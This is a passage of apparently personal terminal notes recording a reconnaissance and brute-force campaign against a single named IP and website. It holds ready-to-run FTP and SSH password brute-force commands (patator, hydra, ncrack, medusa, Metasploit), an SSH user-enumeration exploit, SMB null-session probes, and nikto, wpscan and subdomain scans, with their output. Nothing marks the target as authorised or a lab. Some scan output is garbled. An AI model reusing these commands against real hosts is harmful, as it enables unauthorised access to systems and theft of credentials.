  3008. root@blackbox:/opt/patator# patator ftp_login host=184.154.192.250 user=admin password=FILE0 0=/opt/commix/src/txt/passwords_john.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
  3009.  
  3010. 15:03:18 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2020-01-22 15:03 CST
  3011. 15:03:18 patator INFO - Progress: 0.0% (0/1) | Speed: 10 r/s | ETC: 15:03:18 (00:00:00 remaining)
  3012. 15:03:18 patator INFO -
  3013. 15:03:18 patator INFO - code size time | candidate | num | mesg
  3014. 15:03:18 patator INFO - -----------------------------------------------------------------------------
  3015. 15:06:01 patator INFO - Hits/Done/Skip/Fail/Size: 0/3108/0/0/3108, Avg: 19 r/s, Time: 0h 2m 43s
  3016.  
  3017.  
  3018. SSH USERS ENUMERATION
  3019.  
  3020. root@blackbox:~# locate users | grep users.txt
  3021. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3022.  
  3023. msf5 > use auxiliary/scanner/ssh/ssh_enumusers
  3024. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
  3025. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 84.154.192.250
  3026. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3027. USER_FILE => /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3028. msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
  3029.  
  3030. SSH - User 'root' found
  3031.  
  3032. https://www.exploit-db.com/exploits/45210
  3033.  
  3034. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 admin
  3035. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 root
  3036.  
  3037.  
  3038. SSH BRUTE
  3039.  
  3040. use auxiliary/scanner/ssh/ssh_login
  3041. msf exploit (ssh_login)>set rhosts 184.154.192.250
  3042. msf exploit (ssh_login)>set user_file /root/Desktop/user.txt
  3043. msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt
  3044. msf exploit (ssh_login)>exploit
  3045.  
  3046.  
  3047. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /opt/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://184.154.192.250 -t 4
  3048.  
  3049. patator ssh_login host=184.154.192.250 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
  3050.  
  3051. ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 184.154.192.250:22
  3052.  
  3053. medusa -h 184.154.192.250 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
  3054.  
  3055.  
  3056. usernames list
  3057. /opt/SecLists/Usernames/top-usernames-shortlist.txt
  3058.  
  3059. passwords list
  3060. /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
  3061.  
  3062. passwords list combo
  3063. /opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
  3064.  
  3065. root@blackbox:~# ssh_scan -t 184.154.192.250
  3066.  
  3067.  
  3068. SSH SCAN
  3069.  
  3070. root@blackbox:/opt/smbmap# ssh_scan -t 184.154.192.250
  3071. [
  3072. {
  3073. "ssh_scan_version": "0.0.42",
  3074. "ip": "184.154.192.250",
  3075. "hostname": "server.etours.cn",
  3076. "port": 22,
  3077. "server_banner": "SSH-2.0-OpenSSH_4.3",
  3078. "ssh_version": 2.0,
  3079. "os": "unknown",
  3080. "os_cpe": "o:unknown",
  3081. "ssh_lib": "openssh",
  3082. "ssh_lib_cpe": "a:openssh:openssh:4.3",
  3083. "key_algorithms": [
  3084. "diffie-hellman-group-exchange-sha1",
  3085. "diffie-hellman-group14-sha1",
  3086. "diffie-hellman-group1-sha1"
  3087. ],
  3088. "encryption_algorithms_client_to_server": [
  3089. "aes128-ctr",
  3090. "aes192-ctr",
  3091. "aes256-ctr",
  3092. "arcfour256",
  3093. "arcfour128",
  3094. "aes128-cbc",
  3095. "3des-cbc",
  3096. "blowfish-cbc",
  3097. "cast128-cbc",
  3098. "aes192-cbc",
  3099. "aes256-cbc",
  3100. "arcfour",
  3101. "rijndael-cbc@lysator.liu.se"
  3102. ],
  3103. "encryption_algorithms_server_to_client": [
  3104. "aes128-ctr",
  3105. "aes192-ctr",
  3106. "aes256-ctr",
  3107. "arcfour256",
  3108. "arcfour128",
  3109. "aes128-cbc",
  3110. "3des-cbc",
  3111. "blowfish-cbc",
  3112. "cast128-cbc",
  3113. "aes192-cbc",
  3114. "aes256-cbc",
  3115. "arcfour",
  3116. "rijndael-cbc@lysator.liu.se"
  3117. ],
  3118. "mac_algorithms_client_to_server": [
  3119. "hmac-md5",
  3120. "hmac-sha1",
  3121. "hmac-ripemd160",
  3122. "hmac-ripemd160@openssh.com",
  3123. "hmac-sha1-96",
  3124. "hmac-md5-96"
  3125. ],
  3126. "mac_algorithms_server_to_client": [
  3127. "hmac-md5",
  3128. "hmac-sha1",
  3129. "hmac-ripemd160",
  3130. "hmac-ripemd160@openssh.com",
  3131. "hmac-sha1-96",
  3132. "hmac-md5-96"
  3133. ],
  3134. "compression_algorithms_client_to_server": [
  3135. "none",
  3136. "zlib@openssh.com"
  3137. ],
  3138. "compression_algorithms_server_to_client": [
  3139. "none",
  3140. "zlib@openssh.com"
  3141. ],
  3142. "languages_client_to_server": [
  3143.  
  3144. ],
  3145. "languages_server_to_client": [
  3146.  
  3147. ],
  3148. "auth_methods": [
  3149. "publickey",
  3150. "gssapi-with-mic",
  3151. "password"
  3152. ],
  3153. "keys": {
  3154. "rsa": {
  3155. "raw": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7KnYh43OYzJfoqtaHDqyUUbN3AkmyU4UhmHokahcHmg5okzEqkYX6IzLepxU1UgFFCaOMozBF/fU0iibocOidKZZST/13CvcRtaHXCwtZEFii+9NopBk08q7tCu0N6lv1IZKHWvBdIKalwzHpnwYntpvmPR3Y7tfHtxWpF/lh7TGCzdah1aeuET1P8hp7dGjkt6f07pbf/j/8CjMDp4DLVxRCdSL9DlZuqMYi0qZMk9g99YCorkQDUO20lHL89zzUXiDBEpEKVsrf9JFMb4/MRLaDQ8sVoBqPQRuFYFQaNgWkHs88OrtdV3MpMhaRxLcGcHtkzeAlc5OTAodzWgwxw==",
  3156. "length": 2048,
  3157. "fingerprints": {
  3158. "md5": "48:4f:ba:b1:e8:ae:12:ee:2b:e9:38:87:93:38:5c:4d",
  3159. "sha1": "0d:13:d6:24:42:42:85:97:36:3c:b4:57:c9:83:57:0c:12:73:4f:a2",
  3160. "sha256": "a8:0b:2f:13:a4:dd:f2:00:4f:ad:65:e7:18:70:d5:66:60:eb:34:0b:69:f0:b4:d6:b7:0a:03:01:37:56:f5:d9"
  3161. }
  3162. }
  3163. },
  3164. "dns_keys": [
  3165.  
  3166. ],
  3167. "duplicate_host_key_ips": [
  3168.  
  3169. ],
  3170. "compliance": {
  3171. "policy": "Mozilla Modern",
  3172. "compliant": false,
  3173. "recommendations": [
  3174. "Add these key exchange algorithms: curve25519-sha256@libssh.org,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256",
  3175. "Add these MAC algorithms: hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com",
  3176. "Add these encryption ciphers: chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com",
  3177. "Remove these key exchange algorithms: diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1",
  3178. "Remove these MAC algorithms: hmac-md5, hmac-sha1, hmac-ripemd160, hmac-ripemd160@openssh.com, hmac-sha1-96, hmac-md5-96",
  3179. "Remove these encryption ciphers: arcfour256, arcfour128, aes128-cbc, 3des-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour, rijndael-cbc@lysator.liu.se",
  3180. "Remove these authentication methods: gssapi-with-mic, password"
  3181. ],
  3182. "references": [
  3183. "https://wiki.mozilla.org/Security/Guidelines/OpenSSH"
  3184. ],
  3185. "grade": "F"
  3186. },
  3187. "start_time": "2020-01-22 15:10:54 -0600",
  3188. "end_time": "2020-01-22 15:10:57 -0600",
  3189. "scan_duration_seconds": 3.036491516
  3190. }
  3191. ]
  3192.  
  3193.  
  3194. SMB CHECK
  3195.  
  3196.  
  3197. root@blackbox:/opt# git clone https://github.com/ShawnDEvans/smbmap.git
  3198. root@blackbox:/opt# cd smbmap/
  3199. root@blackbox:/opt/smbmap# python3 -m pip install -r requirements.txt
  3200.  
  3201. root@blackbox:/opt/smbmap# python3 smbmap.py -u admin -p admin -d workgroup -H 184.154.192.250
  3202.  
  3203. root@blackbox:/opt/smbmap# python3 smbmap.py -u guest -p "" -H 184.154.192.250
  3204.  
  3205. Using null session
  3206.  
  3207. root@blackbox:/opt/smbmap# python3 smbmap.py -H 184.154.192.250 -r
  3208.  
  3209. Guest Session with port specified for Samba
  3210.  
  3211. root@blackbox:/opt/smbmap# python3 smbmap.py -u "" -p "" -H 184.154.192.250 -P 139
  3212.  
  3213. root@blackbox:/opt/smbmap# python3 smbmap.py -u administrator -p administrator -H 184.154.192.250
  3214.  
  3215.  
  3216. root@blackbox:/opt/smbmap# nmap --script smb-vuln* -p 137,139,443,80,22,21 184.154.192.250 --open
  3217. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 15:08 CST
  3218. Nmap scan report for server.etours.cn (184.154.192.250)
  3219. Host is up (0.081s latency).
  3220. Not shown: 2 closed ports
  3221. PORT STATE SERVICE
  3222. 21/tcp open ftp
  3223. 22/tcp open ssh
  3224. 80/tcp open http
  3225. 443/tcp open https
  3226.  
  3227. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
  3228.  
  3229. NIKTO CHECK
  3230.  
  3231. root@blackbox:/opt# nikto -h etours.cn -C all
  3232. - Nikto v2.1.6
  3233. ---------------------------------------------------------------------------
  3234. + Target IP: 184.154.192.250
  3235. + Target Hostname: etours.cn
  3236. + Target Port: 80
  3237. + Start Time: 2020-01-23 03:57:53 (GMT-6)
  3238. ---------------------------------------------------------------------------
  3239. + Server: Apache
  3240. + The anti-clickjacking X-Frame-Options header is not present.
  3241. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3242. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3243. + Root page / redirects to: http://www.etours.cn/
  3244. + Retrieved x-powered-by header: PleskLin
  3245. + Server may leak inodes via ETags, header found with file /6BsxYMU7.pl, inode: 20758719, size: 954, mtime: Wed Sep 14 18:10:28 2011
  3246. + Uncommon header 'link' found, with contents: <http://www.etours.cn/blog/wp-json/>; rel="https://api.w.org/"
  3247. + OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
  3248. + OSVDB-3268: /icons/: Directory indexing found.
  3249. + OSVDB-3233: /icons/README: Apache default file found.
  3250. + 26400 requests: 0 error(s) and 9 item(s) reported on remote host
  3251. + End Time: 2020-01-23 06:12:41 (GMT-6) (8088 seconds)
  3252. ---------------------------------------------------------------------------
  3253. + 1 host(s) tested
  3254.  
  3255.  
  3256.  
  3257. http://www.etours.cn/blog/wp-json/
  3258.  
  3259. root@blackbox:/opt# git clone https://github.com/wpscanteam/wpscan.git
  3260. root@blackbox:/opt# cd wpscan
  3261. root@blackbox:/opt/wpscan# gem install wpscan
  3262.  
  3263.  
  3264. root@blackbox:/opt/wpscan# nano ~/.wpscan/scan.yml
  3265.  
  3266. cli_options:
  3267. api_token:
  3268.  
  3269. root@blackbox:/opt/wpscan# wpscan --url http://www.etours.cn/blog/ --enumerate u1-100
  3270. _______________________________________________________________
  3271. __ _______ _____
  3272. \ \ / / __ \ / ____|
  3273. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  3274. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  3275. \ /\ / | | ____) | (__| (_| | | | |
  3276. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  3277.  
  3278. WordPress Security Scanner by the WPScan Team
  3279. Version 3.7.7
  3280. Sponsored by Automattic - https://automattic.com/
  3281. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  3282. _______________________________________________________________
  3283.  
  3284. [+] URL: http://www.etours.cn/blog/
  3285. [+] Started: Wed Jan 22 16:15:53 2020
  3286.  
  3287. Interesting Finding(s):
  3288.  
  3289. [+] http://www.etours.cn/blog/
  3290. | Interesting Entries:
  3291. | - Server: Apache
  3292. | - X-Powered-By: PleskLin
  3293. | Found By: Headers (Passive Detection)
  3294. | Confidence: 100%
  3295.  
  3296. [+] http://www.etours.cn/blog/xmlrpc.php
  3297. | Found By: Link Tag (Passive Detection)
  3298. | Confidence: 100%
  3299. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
  3300. | References:
  3301. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3302. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3303. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3304. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3305. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3306.  
  3307. [+] http://www.etours.cn/blog/readme.html
  3308. | Found By: Direct Access (Aggressive Detection)
  3309. | Confidence: 100%
  3310.  
  3311. [+] http://www.etours.cn/blog/wp-cron.php
  3312. | Found By: Direct Access (Aggressive Detection)
  3313. | Confidence: 60%
  3314. | References:
  3315. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3316. | - https://github.com/wpscanteam/wpscan/issues/1299
  3317.  
  3318. [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
  3319. | Found By: Rss Generator (Passive Detection)
  3320. | - http://www.etours.cn/blog/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3321. | - http://www.etours.cn/blog/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3322. |
  3323. | [!] 12 vulnerabilities identified:
  3324. |
  3325. | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
  3326. | Fixed in: 5.1.2
  3327. | References:
  3328. | - https://wpvulndb.com/vulnerabilities/9867
  3329. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
  3330. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3331. | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
  3332. | - https://hackerone.com/reports/339483
  3333. |
  3334. | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
  3335. | Fixed in: 5.1.2
  3336. | References:
  3337. | - https://wpvulndb.com/vulnerabilities/9864
  3338. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
  3339. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3340. | - https://fortiguard.com/zeroday/FG-VD-18-165
  3341. | - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
  3342. |
  3343. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
  3344. | Fixed in: 5.1.3
  3345. | References:
  3346. | - https://wpvulndb.com/vulnerabilities/9908
  3347. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
  3348. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3349. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3350. |
  3351. | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
  3352. | Fixed in: 5.1.3
  3353. | References:
  3354. | - https://wpvulndb.com/vulnerabilities/9909
  3355. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
  3356. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3357. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3358. | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
  3359. | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
  3360. |
  3361. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
  3362. | Fixed in: 5.1.3
  3363. | References:
  3364. | - https://wpvulndb.com/vulnerabilities/9910
  3365. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
  3366. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3367. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3368. |
  3369. | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
  3370. | Fixed in: 5.1.3
  3371. | References:
  3372. | - https://wpvulndb.com/vulnerabilities/9911
  3373. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
  3374. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3375. | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
  3376. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3377. |
  3378. | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
  3379. | Fixed in: 5.1.3
  3380. | References:
  3381. | - https://wpvulndb.com/vulnerabilities/9912
  3382. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
  3383. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
  3384. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3385. | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
  3386. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3387. |
  3388. | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
  3389. | Fixed in: 5.1.3
  3390. | References:
  3391. | - https://wpvulndb.com/vulnerabilities/9913
  3392. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
  3393. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3394. | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
  3395. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3396. |
  3397. | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
  3398. | Fixed in: 5.1.4
  3399. | References:
  3400. | - https://wpvulndb.com/vulnerabilities/9973
  3401. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
  3402. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
  3403. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3404. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
  3405. |
  3406. | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
  3407. | Fixed in: 5.1.4
  3408. | References:
  3409. | - https://wpvulndb.com/vulnerabilities/9975
  3410. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
  3411. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3412. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3413. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3414. | - https://hackerone.com/reports/509930
  3415. | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
  3416. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
  3417. |
  3418. | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
  3419. | Fixed in: 5.1.4
  3420. | References:
  3421. | - https://wpvulndb.com/vulnerabilities/9976
  3422. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
  3423. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
  3424. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3425. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
  3426. |
  3427. | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
  3428. | Fixed in: 5.1.4
  3429. | References:
  3430. | - https://wpvulndb.com/vulnerabilities/10004
  3431. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
  3432. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3433. | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
  3434.  
  3435. [+] WordPress theme in use: twentyeleven
  3436. | Location: http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3437. | Last Updated: 2019-05-07T00:00:00.000Z
  3438. | Readme: http://www.etours.cn/blog/wp-content/themes/twentyeleven/readme.txt
  3439. | [!] The version is out of date, the latest version is 3.3
  3440. | Style URL: http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css
  3441. | Style Name: Twenty Eleven
  3442. | Style URI: http://wordpress.org/extend/themes/twentyeleven
  3443. | Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a cust...
  3444. | Author: the WordPress team
  3445. | Author URI: http://wordpress.org/
  3446. |
  3447. | Found By: Css Style In Homepage (Passive Detection)
  3448. | Confirmed By: Css Style In 404 Page (Passive Detection)
  3449. |
  3450. | Version: 1.2 (80% confidence)
  3451. | Found By: Style (Passive Detection)
  3452. | - http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css, Match: 'Version: 1.2'
  3453.  
  3454. [+] Enumerating Users (via Passive and Aggressive Methods)
  3455. Brute Forcing Author IDs - Time: 00:00:18 <==============================================================================================================> (100 / 100) 100.00% Time: 00:00:18
  3456.  
  3457. [i] User(s) Identified:
  3458.  
  3459. [+] admin
  3460. | Found By: Author Posts - Author Pattern (Passive Detection)
  3461. | Confirmed By:
  3462. | Rss Generator (Passive Detection)
  3463. | Wp Json Api (Aggressive Detection)
  3464. | - http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3465. | Rss Generator (Aggressive Detection)
  3466. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  3467. | Login Error Messages (Aggressive Detection)
  3468.  
  3469. [+] WPVulnDB API OK
  3470. | Plan: free
  3471. | Requests Done (during the scan): 2
  3472. | Requests Remaining: 48
  3473.  
  3474. [+] Finished: Wed Jan 22 16:16:42 2020
  3475. [+] Requests Done: 140
  3476. [+] Cached Requests: 7
  3477. [+] Data Sent: 32.334 KB
  3478. [+] Data Received: 488.05 KB
  3479. [+] Memory used: 138.605 MB
  3480. [+] Elapsed time: 00:00:48
  3481.  
  3482.  
  3483. http://www.etours.cn/blog/phpinfo.php
  3484.  
  3485. Proudly powered by WordPress
  3486.  
  3487. http://www.etours.cn/blog/wp-login.php
  3488.  
  3489.  
  3490. http://www.etours.cn/blog/
  3491. http://www.etours.cn/blog/xmlrpc.php
  3492. http://www.etours.cn/blog/readme.html
  3493. http://www.etours.cn/blog/wp-cron.php
  3494. http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3495. http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3496.  
  3497.  
  3498.  
  3499. SUBDOMAIN SCAN USING KNOCK
  3500.  
  3501.  
  3502. root@blackbox:/# cd /opt/
  3503. root@blackbox:/opt# apt-get install python-dnspython
  3504. root@blackbox:/opt# git clone https://github.com/guelfoweb/knock.git
  3505. root@blackbox:/opt# cd knock
  3506. root@blackbox:/opt/knock# leafpad knockpy/config.json
  3507.  
  3508. INSERT YOUR VIRUS TOTAL API KEY
  3509.  
  3510. root@blackbox:/opt/knock# python setup.py install
  3511.  
  3512.  
  3513. root@blackbox:/opt/knock# knockpy etours.cn
  3514.  
  3515. _ __ _
  3516. | |/ / | | 4.1.1
  3517. | ' / _ __ ___ ___| | ___ __ _ _
  3518. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3519. | . \| | | | (_) | (__| <| |_) | |_| |
  3520. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3521. | | __/ |
  3522. |_| |___/
  3523.  
  3524. + checking for virustotal subdomains: YES
  3525. [
  3526. "www.etours.cn",
  3527. "mail.etours.cn",
  3528. "beijing.etours.cn"
  3529. ]
  3530. + checking for wildcard: NO
  3531. + checking for zonetransfer: NO
  3532. + resolving target: YES
  3533. - scanning for subdomain...
  3534.  
  3535. Ip Address Status Type Domain Name Server
  3536. ---------- ------ ---- ----------- ------
  3537. 184.154.192.250 200 host beijing.etours.cn Apache
  3538. 184.154.192.250 200 host dns.etours.cn Apache
  3539. 184.154.192.250 200 host ftp.etours.cn Apache
  3540. 184.154.192.250 200 host mail.etours.cn Apache
  3541. 184.154.192.250 302 host webmail.etours.cn Apache
  3542. 184.154.192.250 200 host www.etours.cn Apache
  3543.  
  3544.  
  3545. Check zone transfer for domain name
  3546.  
  3547. root@blackbox:/opt/knock# knockpy -r etours.cn
  3548.  
  3549. _ __ _
  3550. | |/ / | | 4.1.1
  3551. | ' / _ __ ___ ___| | ___ __ _ _
  3552. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3553. | . \| | | | (_) | (__| <| |_) | |_| |
  3554. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3555. | | __/ |
  3556. |_| |___/
  3557.  
  3558. + checking for virustotal subdomains: YES
  3559. [
  3560. "www.etours.cn",
  3561. "mail.etours.cn",
  3562. "beijing.etours.cn"
  3563. ]
  3564. + checking for wildcard: NO
  3565. + checking for zonetransfer: NO
  3566. + resolving target: YES
  3567. {
  3568. "zonetransfer": {
  3569. "enabled": false,
  3570. "list": []
  3571. },
  3572. "target": "etours.cn",
  3573. "hostname": "etours.cn",
  3574. "virustotal": [
  3575. "www.etours.cn",
  3576. "mail.etours.cn",
  3577. "beijing.etours.cn"
  3578. ],
  3579. "alias": [],
  3580. "wildcard": {
  3581. "detected": {},
  3582. "test_target": "flvckazhp.etours.cn",
  3583. "enabled": false,
  3584. "http_response": {}
  3585. },
  3586. "ipaddress": [
  3587. "184.154.192.250"
  3588. ],
  3589. "response_time": "0.484440803528",
  3590. "http_response": {
  3591. "status": {
  3592. "reason": "Moved Permanently",
  3593. "code": 301
  3594. },
  3595. "http_headers": {
  3596. "date": "Wed, 22 Jan 2020 21:40:37 GMT",
  3597. "connection": "close",
  3598. "content-type": "text/html; charset=iso-8859-1",
  3599. "location": "http://www.etours.cn/",
  3600. "server": "Apache"
  3601. }
  3602. }
  3603. }
  3604.  
  3605.  
  3606.  
  3607. root@blackbox:/opt/knock# knockpy 184.154.192.250
  3608.  
  3609. _ __ _
  3610. | |/ / | | 4.1.1
  3611. | ' / _ __ ___ ___| | ___ __ _ _
  3612. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3613. | . \| | | | (_) | (__| <| |_) | |_| |
  3614. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3615. | | __/ |
  3616. |_| |___/
  3617.  
  3618. + checking for virustotal subdomains: NO
  3619. + checking for wildcard: NO
  3620. + checking for zonetransfer: NO
  3621. + resolving target: YES
  3622. - scanning for subdomain...
  3623.  
  3624. Ip Address Status Type Domain Name Server
  3625. ---------- ------ ---- ----------- ------
  3626.  
  3627.  
  3628. knockpy etours.cn
  3629.  
  3630. subdomain scan with external wordlist
  3631.  
  3632. root@blackbox:/opt/knock# locate subdomains.txt
  3633. /opt/SecLists/Discovery/DNS/shubs-subdomains.txt
  3634.  
  3635.  
  3636. root@blackbox:/opt/knock# knockpy etours.cn -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3637.  
  3638. _ __ _
  3639. | |/ / | | 4.1.1
  3640. | ' / _ __ ___ ___| | ___ __ _ _
  3641. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3642. | . \| | | | (_) | (__| <| |_) | |_| |
  3643. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3644. | | __/ |
  3645. |_| |___/
  3646.  
  3647. + checking for virustotal subdomains: YES
  3648. [
  3649. "www.etours.cn",
  3650. "mail.etours.cn",
  3651. "beijing.etours.cn"
  3652. ]
  3653. + checking for wildcard: NO
  3654. + checking for zonetransfer: NO
  3655. + resolving target: YES
  3656. - scanning for subdomain...
  3657.  
  3658. Ip Address Status Type Domain Name Server
  3659. ---------- ------ ---- ----------- ------
  3660. 184.154.192.250 200 host mbeijing.etours.cneuatmistir Apache
  3661. 184.154.192.250 200 host edns.etours.cnarelluraggyp.7236.nApache
  3662. 184.154.192.250 200 host aftp.etours.cnpa.977992.n3s10 Apache
  3663. 184.154.192.250 200 host 8mail.etours.cnneegrangese-lack.vApache
  3664. 184.154.192.250 302 host uwebmail.etours.cn-proxy-iossent Apache
  3665. 184.154.192.250 200 host nwww.etours.cnenor.en Apache
  3666.  
  3667.  
  3668. http://184.154.192.250:8880/login_up.php3
  3669. https://184.154.192.250:8443/login_up.php3
  3670.  
  3671.  
  3672.  
  3673. root@blackbox:~# gobuster dir -u 184.154.192.250 -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3674.  
  3675.  
